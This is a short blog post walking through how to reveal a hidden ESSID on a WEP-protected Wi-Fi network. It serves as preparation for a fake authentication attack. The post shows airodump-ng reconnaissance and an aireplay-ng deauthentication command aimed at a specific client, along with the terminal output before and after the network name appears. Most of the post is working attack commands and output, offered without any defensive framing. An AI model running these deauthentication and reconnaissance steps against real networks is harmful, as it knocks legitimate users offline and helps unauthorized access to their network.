Sometimes airodump-ng wont show you the ESSID of an access point. you'll need the ESSID so you can do the fake authentication attack.
root@segfault:/home/cg/eric-g# airodump-ng ath0 --bssid 00:14:BF:9D:BA:DA -c 11
CH 11 ][ Elapsed: 9 s ][ 2007-11-25 23:43
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:BF:9D:BA:DA 13 37 98 15 2 11 48 WEP WEP (length: 7)
BSSID STATION PWR Lost Packets Probes
00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 1
00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 6 11 7
the solution to that is to deauth a client on the network, when they re-authenticate the ESSID should present itself.
root@segfault:/home/cg/casa# aireplay-ng -0 10 -a 00:14:BF:9D:BA:DA -c 00:17:3F:74:80:D6 ath0
23:45:50 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:51 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:52 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:53 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:55 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:56 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:57 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:58 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:59 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:46:01 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
watch your airodump output and the ESSID should change from length:# to the actual ESSID
CH 11 ][ Elapsed: 1 min ][ 2007-11-25 23:46
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:BF:9D:BA:DA 12 83 1093 122 5 11 48 WEP WEP OPN general
BSSID STATION PWR Lost Packets Probes
00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 5 0 651
00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 2
our ESSID is "general"
-CG
No comments:
Post a Comment